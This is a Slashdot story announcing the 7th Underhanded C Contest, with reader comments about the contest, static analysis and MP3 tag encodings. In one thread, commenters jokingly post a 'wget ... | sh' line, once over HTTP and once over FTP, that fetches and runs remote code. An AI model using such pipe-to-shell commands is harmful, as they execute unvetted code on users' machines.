The 7th Underhanded C Contest Is Online

← Back to Stories (view on slashdot.org)

The 7th Underhanded C Contest Is Online

Posted by samzenpus on Monday November 3, 2014 @04:40AM from the back-again dept.

Xcott Craver writes The 7th Underhanded C Contest is now open. The goal of the contest is to write code that is as readable, clear, innocent and straightforward as possible, and yet somehow exhibits evil behavior that cannot be seen even when staring at the source code. The winners from 2013 are also online, and their clever and insightful submissions make for fun reading.

41 comments

Min score:

Reason:

Sort:

New twist this time by Anonymous Coward · 2014-11-03 04:46 · Score: 5, Funny

Previously the contest has been about doing nefarious stuff to the user of the program while keeping the code innocuous.
This time, they want you to clandestinely warn users of government spying. It's a complete about-face on the definition of "underhanded". I love it.
1. Re:New twist this time by Wonko+the+Sane · 2014-11-03 04:49 · Score: 3, Funny
  
  This NSA recruiting program has to become more subtle in order to attract participants.
2. Re:New twist this time by Anonymous Coward · 2014-11-03 05:03 · Score: 3, Informative
  
  If you read the whole thing you'd notice that you're playing the role of an NSA insider who's leaking information... I thought you people liked that sort of thing?
3. Re:New twist this time by Anonymous Coward · 2014-11-03 06:06 · Score: 0
  
  you people? what do you mean by YOU PEOPLE?
  on a more serious note, this helps them find insiders writing underhanded code in the NSA systems.
4. Re:New twist this time by alvinrod · 2014-11-03 06:23 · Score: 4, Insightful
  
  Or it gives some insiders who might want to do such a thing a few ideas of how to go about it while maintaining plausible deniability.
The previous entry page leads to 404 by Anonymous Coward · 2014-11-03 04:52 · Score: 0

http://www.brainhz.com/underhanded
1. Re:The previous entry page leads to 404 by Xcott+Craver · 2014-11-03 04:59 · Score: 4, Funny
  
  That's not a defunct link to previous entries, but a defunct link to a previous version of the contest site. I've un-defuncteded it to more recent previous version of the contest site, but soon that will also be defunctitated or defunctified, or defunctored.
  You can see the previous entries by scrolling down, or by selecting "past years" from the menu bar on the web page.
2. Re:The previous entry page leads to 404 by gstoddart · 2014-11-03 05:05 · Score: 4, Funny
  
  I've un-defuncteded it to more recent previous version of the contest site, but soon that will also be defunctitated or defunctified, or defunctored.
  What defunct are you talking about? ;-)
  
  --
  Lost at C:>. Found at C.
3. Re:The previous entry page leads to 404 by oodaloop · 2014-11-03 05:05 · Score: 4, Funny
  
  I've un-defuncteded
  
  So it's totally funct now?
  
  --
  Tic-Tac-Toe, Global Thermonuclear War, and relationships all have the same winning move.
4. Re:The previous entry page leads to 404 by Anonymous Coward · 2014-11-03 05:25 · Score: 1
  
  Yes, and I'm very gruntled.
5. Re: The previous entry page leads to 404 by Anonymous Coward · 2014-11-03 05:27 · Score: 0
  
  Bring on defunct! Bring on the noise!
6. Re:The previous entry page leads to 404 by Anonymous Coward · 2014-11-03 05:27 · Score: 0
  
  So who wins the Undefuncted C Code Contest Contest?
7. Re:The previous entry page leads to 404 by DRJlaw · 2014-11-03 09:35 · Score: 2
  
  What defunct are you talking about? ;-)
  We want the funct!
  Give up the funct!
  We need the funct!
  We gotta have that funct!
  Owww! Stop the hitting...
8. Re:The previous entry page leads to 404 by Anonymous Coward · 2014-11-03 10:15 · Score: 0
  
  We got the funk.
  Gotta have that funk! /Parliament
Not so clever by Anonymous Coward · 2014-11-03 05:06 · Score: 3, Informative

Don't get me wrong this is all great fun yet many of these schemes stand no chance of being committed in any serious project.
Implicit returns generate compiler warnings.
printf variable as format specifier is a well known security issue lazy eyeballs and static analysis tools check for.
Serialization delimiter games are also well known issues standing little chance of being accepted.
1. Re:Not so clever by BlackPignouf · 2014-11-03 05:34 · Score: 3, Funny
  
  Yeah right.
  Something like this http://www.gergely.risko.hu/de... would never get committed.
2. Re:Not so clever by Anonymous Coward · 2014-11-03 06:38 · Score: 1
  
  To be fair, the macro Debian removed was causing all sorts of warnings from one of them thar "analysis tools" for using uninitialized memory.
3. Re:Not so clever by frank_adrian314159 · 2014-11-03 11:32 · Score: 1
  
  CVE is a thing because static analysis tools are too chatty about too many things that have no chance of causing failure given your particular architecture or other system characteristics, but need to be examined/handled nevertheless. Tie that in with often subpar tools with subpar UI's and/or configurability and/or management that worries more about new features than code hygiene, and you will be saddled with CVE's because the tools wont be used, no matter how many issues they might find.
  
  --
  That is all.
4. Re:Not so clever by Anonymous Coward · 2014-11-03 12:04 · Score: 0
  
  Think of it this way: These contests exist so that clever programmers can expose flaws in our tools. If someone comes up with a new trick that's not caught by modern tools, then that person gets 15 minutes of fame, and the rest of the world gets a new compiler warning. It's a win-win scenario.
5. Re:Not so clever by Ihlosi · 2014-11-03 19:55 · Score: 1
  
  Think of it this way: These contests exist so that clever programmers can expose flaws in our tools.
  Or in our knowledge. Some entries are based on the fact that the compiler doesn't know what the program is supposed to do, and the person looking at it may not know all the subtleties of the language's syntax. The compiler sees perfectly innocent code, but the code doesn't do what the person reading it thinks it does.
  It would be nice if the scoring criteria were better defined, e.g. "this bug will be detected if syntax coloring is on/compiler warning level is set to max/linker warning level is set to max/MISRA rules are applied to the code/etc.".
My entry by whereiswaldo · 2014-11-03 05:25 · Score: 1

exec("wget -O- http: //127.0.0.1/cute-puppies-and-unicorns-trust-me | sh");
1. Re:My entry by weilawei · 2014-11-03 07:31 · Score: 2
  
  For best results, use FTP! Comes with free side effects.*
  
  exec("wget -O- ftp: //127.0.0.1/cute-puppies-and-unicorns-trust-me | sh");
  (*FTP offer is nontransferable and must be presented at time of online download or Promo Code must be entered at 127.0.0.1 to receive discount. Underhanded discounts applied prior to percent-off total download discounts. Offer cannot be used in conjunction with any other percent-off discounts, including version-specific discounts. Offer not valid on the following merchandise: OpenBSD CD purchases; wget Cares® cause merchandise or other charitable items; prestige brands of operating systems, hardware and select prestige brands of headphones; select electronics/electrics and select Windows merchandise. For a complete list of these merchandise exclusions, click here or look for signs in our stores. Offer also not valid on byte adjustments on prior downloads; payment on a wget’s Charge account; taxes, shipping and/or handling fees. Subject to credit approval. See store for details.
2. Re:My entry by Anonymous Coward · 2014-11-03 12:13 · Score: 0
  
  Better yet: first "upgrade" to pre-shellshock bash, and then pipe the wget to bash.
Not so clever by slashdice · 2014-11-03 05:27 · Score: 4, Insightful

were that true, CVE wouldn't be a thing.

--
Copyright (c) 1990 - 2014 Dice. All rights reserved. Use of this comment is subject to certain Terms and Conditions.
OpenSSL by Anonymous Coward · 2014-11-03 05:46 · Score: 5, Funny

Sorry guys but this year's winner hands down is OpenSSL.
1. Re:OpenSSL by Anonymous Coward · 2014-11-03 05:54 · Score: 0
  
  Any "open source" encryption found on US internet
2. Re: OpenSSL by Anonymous Coward · 2014-11-03 06:52 · Score: 0
  
  ROFL, because on the OTHER internet, you have no worries.
3. Re:OpenSSL by swillden · 2014-11-03 07:54 · Score: 4, Funny
  
  Sorry guys but this year's winner hands down is OpenSSL.
  No, underhanded C submissions have to be readable, clear and straightforward. OpenSSL is none of those.
  
  --
  Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
4. Re:OpenSSL by babydog · 2014-11-03 09:30 · Score: 1
  
  Hey, it _usually_ compiles.
That was fast! by Ihlosi · 2014-11-03 06:08 · Score: 1

The last contest only ended a few weeks ago!
The problem with UCC by Anonymous Coward · 2014-11-03 07:33 · Score: 0

The problem with UCC is the same problem extreme-TDD proponents have. Too much focus on tiny glitches that can easily be found by eye or with LINT-like tools, and no focus at all on design flaws.
Subtle design flaws are much, much harder to spot. Tools will rarely catch them. Compiler buffer overflow checks won't check them. They are the sort of bugs UCC should focus on, rather than missing commas and the like.
1. Re:The problem with UCC by umghhh · 2014-11-03 07:45 · Score: 1
  
  to have design flaws one would need design process in the first place. for number of years already I mostly see coding without design.
Do what Amarok 1.4 does to MP3 tags. by throwawayUnderhanded · 2014-11-03 08:55 · Score: 2

In Amarok 1.4, when you change the tags in an MP3 file, they are not actually ASCII, they are some kind of UTF-8 reencode that looks exactly like ASCII in Amarok and get printed correctly on a terminal. But when the files are transferred and displayed on some MP3 players they appear as "mojibake".
1. Re:Do what Amarok 1.4 does to MP3 tags. by Anonymous Coward · 2014-11-03 11:57 · Score: 1
  
  I transcoded some FLACs to mp3s the other day using mp3fs (aside: which is actually really cool, it's a fuse filesystem that you point to somewhere containing flacs, and when you browse the mount point all the .flac files show up as .mp3 and you can just copy the mp3 files out). The FLAC tags are readable in Windows (both winamp and QuodLibet) and Linux. The mp3 tags are readable in Windows (winamp, QuodLibet and File Explorer's tracklist view) and Linux. All of the tags are gibberish on my car's in-dash MP3 player, even the ones that are just plain English.
  I suspect (damned if I'm going to care long enough to find out) that it's using UTF16 for the tags and the car radio is flipping out over the null bytes in the tags.
2. Re:Do what Amarok 1.4 does to MP3 tags. by Anonymous Coward · 2014-11-03 13:39 · Score: 0
  
  I've never heard of mp3fs before and I'm glad that I saw your comment. That is a really, really slick concept. I've never thought of using FUSE for something like that before but now it seems obvious. A transparent transcoder built right into the file system! Similar applications could be done for picture formats, text, movies, etc., really brilliant.
3. Re:Do what Amarok 1.4 does to MP3 tags. by Anonymous Coward · 2014-11-03 21:33 · Score: 0
  
  A few years ago, when I was on winter holiday + caught a cold there and was bored to death. I mused the next few days about building a kernel module which transparently removes CSS from DVDs. Couldn't pull it off, because I didn't know shit about kernel driver development, and I couldn't find a way to stack a driver onto another driver (which I found out kinda works, by importing a function from another driver into your own driver).
4. Re:Do what Amarok 1.4 does to MP3 tags. by dotancohen · 2014-11-04 03:31 · Score: 1
  
  It might be rendering the tags in UTF-16, which for code points \x00 - \x7F look just like ASCII with a NULL byte \x00 before (Big Endian) or after (Little Endian) each printable character.
  Can you give an example? I'll take a look. Run Unix "strings" on the file, run it through "hd" and post it as a reply here.
  $ strings file.mp3 | grep "known text" | hd
  
  --
  It is dangerous to be right when the government is wrong.
For someone w/o a bachelors in Comp Sci by Anonymous Coward · 2014-11-03 09:29 · Score: 0

Quick question: If one doesn't have a background in computer science, but rather mathematics, and mostly deals with scripting languages (Python, javascript, etc.), would that person be expected to understand these quickly, or even spot these errors? Even with the explanation, it's still a little weird.
It is already clear who the winner is... by Anonymous Coward · 2014-11-03 10:14 · Score: 0

Google Chrome
needed for comparison: UJC by Anonymous Coward · 2014-11-03 13:58 · Score: 1

Most of the entries in past years have relied on subtle use of unsafe code (buffer overruns, platform-dependent quirks, etc.) for which there are plenty of opportunities in C. I'd really like to see them run, in parallel with the same challenge, an Underhanded Java Contest.
BeOS used to do that with CDs by Xcott+Craver · 2014-11-04 00:35 · Score: 1

They added a feature to the filesystem that let you insert a music CD and see the tracks as WAV files, so you could rip the CD simply by dragging them to your desktop.
I remember that because I tried to play a CD by selecting all the tracks in the folder and double-clicking, only to hear the OS play all the CD tracks at the same time.